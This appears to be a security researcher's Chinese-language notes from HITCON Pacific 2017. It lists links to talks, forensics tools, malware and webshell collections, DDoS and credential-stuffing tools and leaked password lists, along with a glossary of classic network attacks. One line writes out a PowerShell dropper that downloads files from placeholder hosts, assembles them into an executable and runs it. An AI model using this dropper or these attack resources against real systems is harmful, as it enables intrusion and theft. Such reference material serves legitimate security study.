HITCON Pacific Day 1 Temp 惡意知識庫 https://owl.nchc.org.tw/
https://drive.google.com/open?id=1hNKwzxx5QuPjn1wTKguwGLmgzVW9etsc https://drive.google.com/open?id=0B9qqqzOjzwW9UFUxY1Rlb0diS00 https://drive.google.com/file/d/0B6cOjCkh6yRSeEc1a0hnaHU3aGM/view?usp=sharing
TeamViewer Hack Could Be Used By Anyone https://thehackernews.com/2017/12/teamviewer-hacking-tool.html
106 第2次政府資通安全防護巡迴研討會ー教材開放下載 https://www.nccst.nat.gov.tw/HandoutDetail?lang=zh&seq=1271
DD作VM virtual forensic computing
2017年置我們于危險之中的那些黑客事件 http://big5.xinhuanet.com/gate/big5/us.xinhuanet.com/2017-12/27/c_129776280.htm
物聯網設備資安檢測 https://www2.deloitte.com/tw/tc/pages/risk/solutions/iot-security.html https://www.onwardsecurity.com/service/item/57 http://www.cna.com.tw/postwrite/Detail/215698.aspx#.WkNyPlWWbIV
應該是 iot 的 malware http://80.211.199.204/bins/
RAR破解 http://www.crark.net/ https://github.com/s3inlc/hashtopussy http://m.kl800.com/read/4743d1bd22cc8f99eaaa2250dc69b0fbc6b1b4a3.html#%23%23 rarPasswordCracker
華為ap https://www.ithome.com.tw/news/120030
kail http://www.freebuf.com/column/156704.html http://www.freebuf.com/column/150118.html
java malware https://github.com/HynekPetrak/javascript-malware-collection
做資料救援 要閱讀各種檔案系統原始碼 跟改寫原有檔案架構Mount 方式
標準流程 先DD,然後 當場開Visutial stidio 寫 build 掃描
https://www.facebook.com/OSSGeekLab/posts/1533862073317741
處理資安事件的流程,首先就是要掃描電子郵件,從掃描信件的標頭與附件中,快速從中找出有害的信件並偵測是否有發現到惡意程式。再者,也要掃描電腦映像檔,掃描相關的登入檔和快取記憶體中的資料,一旦有發現惡意程式導向任何的惡意網路位址(IP),刑事局就會立即採取相對應的行動,如果惡意網址是臺灣內部,偵察人員就會立即到現場調查,但如果是國外的IP,就必須透過國際合作的管道協同作業,才可能順利破案。
密碼檔 https://thehackernews.com/2017/12/data-breach-password-list.html?m=1 https://medium.com/4iqdelvedeep/1-4-billion-clear-text-credentials-discovered-in-a-single-database-3131d0a1ae14
機器人攻擊 https://robotattack.org/#patches
defcon簡報 https://media.defcon.org/ https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/Cheng%20Lei/
Google Driver https://drive.google.com/drive/folders/0B9qqqzOjzwW9YTZjNi1yamJRTkE
hitcon pacific .其中一場的簡報 https://www.facebook.com/OSSGeekLab/posts/1547755515261730
“Skip Cracking Responder Hashes and Replay Them” by Dank Panda (Richard De La Cruz of Tevora). https://gameofpwnz.com/?p=684
資安新聞及事件週報 2017/12/18 ~ 2017/12/22 http://tdoh.logdown.com/posts/2017/12/22/news-and-events-weekly-2017-12-18-2017-12-22
swift https://drive.google.com/drive/folders/0B9qqqzOjzwW9OFFVc0FxOE5CNDA
OSDFCon 2017 快速?急??演示文? http://www.osdfcon.org/presentations/2017/Asif-Matadar_Rapid-Incident-Response.pdf
EVENT LOG https://github.com/MicrosoftDocs/windows-itpro-docs/tree/master/windows/device-security/auditing
Plug-In Contest 2017: Hall Of Fame https://www.hex-rays.com/contests/2017/index.shtml
Breach Prevention Systems (BPS) Group Test https://www.peerlyst.com/posts/nss-labs-breach-prevention-systems-bps-group-test-guurhart?trk=wall_page_activity_feed
好用軟體 https://www.magnetforensics.com/magnet-atlas/
IBM AIX Server 快速筆記1 更新與連線 https://www.osslab.com.tw/aixquicknote1/
Invoke-PSImage https://github.com/peewpw/Invoke-PSImage https://github.com/samratashok/nishang/tree/master/Backdoors $webvar=new-object System.Net.WebClient;$address="http://xxxx,http://xxxxx,http://xxxxx".Split(",");$a=@();foreach($url in $address){try{$randomint=Get-Rando -Minimum 2 -Maximum 36677;$filename=$env:public+""+$randomint+".jpg";$webvar.DownloadFile($url.ToString(),$filename);$a+=$filename;}catch{write-host $_.Execption.Message;}}$p=$env:public+""+"p.exe";$args=$a -join '+';$i="cmd.exe /c copy /b "+$args+" "+$p;iex($i);
Pre-auth Remote Code Execution exploit for QNAP QTS https://pastebin.com/XAKn6q5Y
https://databases.today/index.php https://databases.today/search-nojs.php?for=linkdin
https://l2.io/ip.js?var=iplocal https://www.vulnhub.com/ 現場弄個靶機打看看就知道了 拿 OWASPBWA 去改 WEBPTㄧ關 IRㄧ關 證照ㄧ關
red team 有包含WEBPT 但是 也有把APT手段也包進去 作red team APT SIMULATION? 博奕公司那種 推薦devcore
f5 faw
spam Proofpoint
微軟跟AWS的PK歐 可以參考這份 https://drive.google.com/file/d/0B9qqqzOjzwW9SmotSm85MDhWVTQ/view
https://github.com/D4Vinci/Cr3dOv3r/blob/master/README.md
課程 http://opensecuritytraining.info/Training.html
提供主機的完整性檢查、日誌檔監測與惡意程式 (Rootkit) 掃描的功能 ossim alienvault
https://www.ithome.com.tw/voice/120200 https://medium.com/@CQD/翻譯-我是這樣拿走大家網站上的信用卡號跟密碼的-991cb6c4631e
用簡短的話來描述這次漏洞的話,這個安全漏洞可以允許攻擊者在登入虛擬帳號 A 時,任意查看儲存在同一個物理區域的虛擬用戶 B 的所有資料,包含儲存的密碼與資料等機密資訊。 https://buzzorange.com/techorange/2018/01/03/intel-wtf-bug-let-os-rewrite-and-down-performance/ http://www.limitlessiq.com/news/post/view/id/3061/ https://ithelp.ithome.com.tw/articles/10196515
http://powerofcommunity.net/2017.htm https://drive.google.com/drive/folders/1zd5Pub0c_G2mhaL5jiodDjUU-gI5XChW
http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html
ithome鐵人 https://ithelp.ithome.com.tw/users/20084806/ironman/1549 https://ithelp.ithome.com.tw/users/20107304/ironman/1258 https://ithelp.ithome.com.tw/users/20107543/ironman/1492 https://ithelp.ithome.com.tw/users/20107398/ironman/1517 https://ithelp.ithome.com.tw/users/20103647/ironman/1300 https://ithelp.ithome.com.tw/articles/10190946 https://ithelp.ithome.com.tw/articles/10196226
http://www.hexacorn.com/blog/2018/01/04/yet-another-way-to-hide-from-sysinternals-tools/
https://github.com/MISP/misp-warninglists
mitigate dns rebinding attacks against daemon transmission/transmission#468
https://github.com/deralexxx/security-apis/blob/master/README.md
數位鑑識 http://www.iforensics.com.tw/Products/BelkaSoft.html https://belkasoft.com/download/kMr3YPQkkQkRZvs6tWSNPFiqjhzJ5GnWYTGYF3Mn
HITCON FreeTalk 20180119 https://hackmd.io/EwBgRiDskJwGwFpgGZmICx0gVgTAjAGaJyEAccAhmPiHAMb71A==?view# https://www.facebook.com/HITCON/videos/1732117933486188/
Mirai攻擊介紹 https://github.com/lejolly/mirai/blob/master/attack-instructions.md
2018 hacker report https://ma.hacker.one/rs/168-NAU-732/images/the-2018-hacker-report.pdf
DDOS https://github.com/drego85/DDoS-PHP-Script https://github.com/uiucseclab/460FinalDDoSAttacks/tree/master/TCP%20PSH%2BACK%20Flood
Awesome Threat Detection and Hunting https://github.com/0x4D31/awesome-threat-detection
https://attack.mitre.org/wiki/Updates_January_2018
算牌 http://teddygotmail.pixnet.net/blog/post/23263546-21點算牌教學-第1課-%28基本策略%29
Meltdown 與 Spectre 都有用到的 FLUSH+RELOAD https://blog.gslin.org/archives/2018/01/05/8028/meltdown-與-spectre-都有用到的-flushreload/
Spectre 的攻擊方式 https://blog.gslin.org/archives/2018/01/17/8050/讀書時間%EF%BC%9Aspectre-的攻擊方式/
Meltdown 的攻擊方式 https://blog.gslin.org/archives/2018/01/07/8030/讀書時間%EF%BC%9Ameltdown-的攻擊方式/ https://blog.gslin.org/archives/2018/01/07/8030/讀書時間%EF%BC%9Ameltdown-的攻擊方式/comment-page-1/#comment-412190
自動撞庫 https://github.com/D4Vinci/Cr3dOv3r
https://rmusser.net/docs/AnonOpsecPrivacy.html Investigate Unauthorised Logon Attempts using LogonTracer http://blog.jpcert.or.jp/.s/2018/01/investigate-unauthorised-logon-attempts-using-logontracer.html XSS語法 https://gbhackers.com/top-500-important-xss-cheat-sheet/
https://translate.googleusercontent.com/translate_c?act=url&depth=1&hl=en&ie=UTF8&prev=_t&rurl=translate.google.com&sl=auto&sp=nmt4&tl=zh-TW&u=https://www.wired.com/story/worst-hacks-2017/&usg=ALkJrhjI_J5Cjho7az9m4br3AgNKSwnOZQ 開源郵件閘道伺服器 - Proxmox Mail Gateway http://jasontools.blogspot.tw/2018/01/proxmox-mail-gateway.html
Linux Technique Matrix https://attack.mitre.org/wiki/Linux_Technique_Matrix
reGeorg https://github.com/sensepost/reGeorg
米國軍事熱力圖 https://labs.strava.com/heatmap/#12.67/121.42856/24.96043/hot/all
Buscador調查操作系統 https://inteltechniques.com/buscador/index.html
adr 那篇 360 魯大師提到的那些 patch 裡面有幾個字串帶有 " Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED "
APT模擬器 https://github.com/NextronSystems/APTSimulator
SANS的教材 https://drive.google.com/drive/folders/1Mdxipn8Yt7Wbh4xxIKY36ValvkLe04Ux
https://esupport.gigabyte.com/Question/B2CQuestion
webshell yara https://github.com/Neo23x0/signature-base/blob/master/yara/thor-webshells.yar
Webshell https://github.com/tennc/webshell
Troopers 18 https://drive.google.com/drive/folders/1gLI58T6cyKI-LLD7iaCTTdIveKOsNJt-
Black Hat Asia 2018 https://drive.google.com/drive/folders/15ZJHqOloCnWorWuf5RXQ4VFDdIdSnLMl
Python後門 http://www.freebuf.com/sectool/165789.html https://github.com/Viralmaniar/Powershell-RAT
RSA加密解密原理深度剖析www.freebuf.com/articles/others-articles/166049.html
密码破解全能工具:Hashcat密码破解攻略 http://www.freebuf.com/sectool/164507.html
Art模式下的通用脱壳方法 http://www.freebuf.com/articles/terminal/166307.html
Invoke-Adversary – Simulating Adversary Operations 程式碼
hitbsecconf2018ams https://drive.google.com/drive/folders/1RIVxyHxKZwWPWUaQdYtC1gNutDQFQA8Y
金钱难寐,大盗独行——以太坊 JSON-RPC 接口多种盗币手法大揭秘
Malware analysis tools http://malwareanalysis.tools/tutorials.html https://www.youtube.com/channel/UCVFXrUwuWxNlm6UNZtBLJ-A/videos
https://appliedincidentresponse.com/references https://jpcertcc.github.io/ToolAnalysisResultSheet/ https://github.com/api0cradle/LOLBAS https://github.com/cr4shcod3/pureblood
https://github.com/V33RU/IoTSecurity101
Ubuntu Linux中的特权提升漏洞Dirty Sock分析(含PoC) bonesi :在实验环境下模拟DDoS攻击流量的工具 WinRAR漏洞利用升级 UEFI Firmware Parser:可解析BIOSIntel MEUEFI固件结构 VB反汇编特点汇总:秒破Crackme8-10 Malcom:一款功能强大的图形化恶意软件通信分析工具
SYN Flooding 連線滿溢攻擊 目標平台:全部 後果:Denial of Service 說明:SYN flooding 的方法是以發送大量要求連線的 SYN requests 到目標伺服器,而當該伺服器送回 SYN-ACK response(SYNchronize-ACKnowledge) 後,卻不發送最後的 acknowledgment 回應,讓 3-way handshaking 無法完成,由此消耗用來記錄新連 線的緩衝區 (Buffer) 記憶空間。SYN flooding 可以超載伺服器或造成當機。
Out of Band 目標平台:Windows 95/ NT 後果:Denial of Service–當機 說明:當Windows收到設有"URGENT" flag 的封包,它會預期接下來會有資料。Out of Band攻擊的方法是在 header 設定 URGENT flag,後面的封包卻不接資料,這個矛盾會造成當機。
Teardrop 目標平台:全部 後果:Denial of Service-當機 說明:DOS攻擊的一種,乃是利用主機系統的TCP/IP漏洞,讓網路塞滿垃圾封包,而造成網路癱瘓。 方法:當資料經由網路傳送,IP 封包經常會被切割成許多小片段。每個小片段和原來封包的結構大致都相同〈除某些位移資訊〉。位移資訊主要是用來正確重組 IP 封包。Teardrop 攻擊的方法為發送一對經特別設計過的封包片段到目標電腦,這一對封包片段包含了重疊的位移值,這使得這對封包重組成原來的IP 封包時,產生網路服務主機誤判封包大小現象,造成系統當機現象。
SMB Downgrade 目標平台:Windows NT/ 95 後果:獲取資訊 - Passwords in Ceartext 說明:SMB (Server Message Block) 是一種只用一個密碼來認證的檔案共享協定。它有多種不同的語言,有些用加密的密碼,而一些早期的則只用 cleartext 密碼。有 backward SMB 相容性的 NT 因要與早期的 SMB 版本溝通而使 cleartext 密碼得以處理。此漏洞可讓駭客進一步簡化 '暴力法' (brute force) 的解密碼程式。
Smurf (Smurf broadcast amplifiers attacks) 倍增型攻擊 目標平台:全部 後果:Denial of Service-消耗頻寬 說明:其攻擊主要是直接對網路進行廣播,造成網路很快地充滿垃圾封包而中斷。Smurf會不斷地將小量偽造的icmp要求封包送給IP廣播位址〈IP broadcast〉,然後廣播位址會傳回大量的icmp回應封包給目標電腦。這種smurf的攻擊方式除了攻擊特定目標主機,也能在網路上塞滿icmp的要求封包與回應封包,而造成網路中斷,這種方式具有放大效應,所以常被稱為smurf倍增型攻擊。
Land 攻擊 目標平台:全部 後果:Denial of Service - 當機 說明:Land 攻擊的方式是發送一假冒的 connection request (SYN) 封包到目標。此封包的來源和目的 IP 位址相同而且來源和目的通信埠也相同,使得攻擊目標誤以為是它本身送此封包給自己。 Land 攻擊可造成電腦當機。
Oshare 封包 目標平台:Windows 98 後果: Denial of Service –當機 說明:Oshare 封包是一特製的具破壞性封包可使 Windows 98 出現藍色當機畫面。
Fragmented IGMP 目標平台:Windows 95/ 98/98se/NT4.0 SP* 後果:Denial of Service-當機 說明:駭客若傳送 Fragmented IGMP (Internet Group Management Protocol) 封包到 Windows 95 或 98 電腦時,可能造成電腦操作不正常,例如效率變慢甚至當機。
- 雖然 Windows NT 4.0 含有相同的漏洞,但它其他的系統機制使它比較難以攻擊。
ICMP Router Advertisement 目標平台:Solaris、SunOS、Windows 95/98 後果:Denial of Service/獲取資料 說明:經由假冒 ICMP Router Advertisement 訊息,駭客可由遠端更改預設 route 然後將網路交通流向導往他處。
ICMP Timestamp 目標平台:Windows 98 後果:Denial of Service/當機 說明:Windows 98 處理 ICMP timestamp request 有漏洞,會造成目標電腦不正常動作甚至當機。
Source Routing 目標平台:Windows 95/ 98/ 98se/ NT4.0/ NT4.0 SP5 後果:略過保全 - Source Routing 說明:Source routing 選項可讓封包本身指定到達目的的 route。如果駭客送出一個加上 source routing 資料的特製封包,駭客可略過管制,非法獲取資料。
Tiny Fragments 目標平台:全部 後果:不詳 說明:在網路傳輸過程當中, 因為傳輸線路架構不盡相同,在傳輸過程必須符合下一個傳送線路的最大單位(MTU)的限制, 因此有時需將封包作切割才能順利在網路上傳送訊息。而有些駭客會故意將第一個封包切的太小,小到無法完整存放 header 的資訊,造成讓 防火牆不檢測封包就放行。
NetBIOS Source Null 目標平台:Windows 95/98 後果:Denial of Service–當機 說明:Windows 95/98 的 Messenger 服務有此一漏洞。駭客只需傳送一個有 NULL 來源名稱的 NetBIOS session request 封包到目標電腦即可造成當機。
NetBIOS Name Conflict 目標平台:Windows NT/ 2000 後果:Denial of Service 說明:Windows NT/ 2000 的 NetBIOS Name Server 協定是用來管理網路上使用者名稱。駭客可傳送假冒的 "使用者名稱相衝" ( NetBIOS Name Conflict) 的訊息,而讓該主機無法被網路上的其他電腦存取使用。
Ping of Death
目標平台:全部
後果:Denial of Service–當機
說明:Ping 是用來確定某個 IP 位址是否有連線的 Internet 工具。
"Ping of Death" 攻擊是經由發送過大的 ping request (ICMP echo request 封包) 達成。
Fragmentation 容許傳送這一個過大的封包,但當這個封包重新組合時即超出緩衝區 (Buffer) 限制的
大小而造成超載。被攻擊的電腦會有不正常的動作甚至當機。此攻擊並不限於 ICMP 而是可利用所
有 IP 上的通訊協定。
Port Scanning 連接埠掃瞄 目標平台:全部 後果:獲取存取管道 說明:所有的PC都有65535個連接埠〈Port〉,以作為對外連接的端點。通常駭客會掃瞄欲攻擊的主機開放了哪些連接埠〈Port〉,一旦發現所開放的連接埠〈Port〉中有較易攻擊的服務,就會利用該服務的漏洞進行攻擊。因此Port Scanning是許多網路攻擊的初步手段。
DoS 《Denial of Service》是一種讓用戶端或其他使用者無法從受害電腦上存取資料的網路攻擊形式。其方法通常是由傳送毀損的或大量的資料 requests 來中斷或超載受害電腦,而使正規的連線變慢或完全癱瘓。Denial of service 攻擊會阻礙網路服務一段時間,但不會對資料庫造成重大損害。
https://www.cisecurity.org/cis-benchmarks/ https://drive.google.com/drive/folders/0B9qqqzOjzwW9UFUxY1Rlb0diS00 https://www.blurbiz.io/blog/the-most-complete-guide-to-finding-anyones-email
https://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/
Sigma https://github.com/akky2892/Sigma-to https://github.com/Neo23x0/sigma https://tdm.socprime.com/
URL評分 ScamAdviser 檢測網站是否為釣魚、詐騙網站 PhishTank 反釣魚資料庫 OpenPhish 人工智能來辨識釣魚網站的資料庫
釣魚URL收集: CertStream-Suspicious feed OpenPhish feed PhishTank feed Ayashige feed
Cross Site Scripting ( XSS ) Vulnerability Payload List XSS payload.txt https://medium.com/@man.shum546/xss-payload-2018-5271c5e3bbce
CTF CTF學習規劃 CTF入門指南 CTF基礎知識 CTF資源
CVE-2019-0708 微軟RDP遠程代碼執行漏洞(CVE-2019-0708)分析集錦
evil-winrm:Windows远程管理(WinRM)Shell终极版
AuthCov:一種功能強大的開源Web應用程序授權爬行和掃描工具 SharPersist:一款滲透測試中實現Windows系統常駐的套件 AutoRecon:多線程網絡偵察工具
史無前例:微軟SQL Server被黑客組織安上了後門skip-2.0 盤點近幾年勒索病毒使用的工具與漏洞 子域名枚舉 Emotet銀行木馬攻擊利用技術分析 深入淺出理解操作系統安全 安全小遊戲:尋找漏洞 Haaukins:一款高度自動化和可訪問的安全教育虛擬化平台 ATT&CK框架:攻擊者最常用的TOP7攻擊技術及其檢測策略 一款“殭屍網絡挖礦” 攻擊分析 XSSFORK:新一代XSS自動掃描測試工具 VulnHub靶機系列:Os-ByteSec AuthCov:一種功能強大的開源Web應用程序授權爬行和掃描工具 記錄一次本人實戰blueCMS的全過程 代碼審計思路討論 企業安全建設之自動化代碼掃描 Docker容器安全性分析 警惕利用Linux預加載型惡意動態鏈接庫的後門 手把手帶你利用SQLmap結合OOB技術實現音速盲注 應急響應系列之Linux庫文件劫持技術分析 滲透技巧之Powershell實戰技巧 CSRF攻擊防禦原理 機器學習之惡意流量檢測的特徵工程 Go語言代碼安全審計分享 Linux安全管理與行為監控 報錯注入的原理分析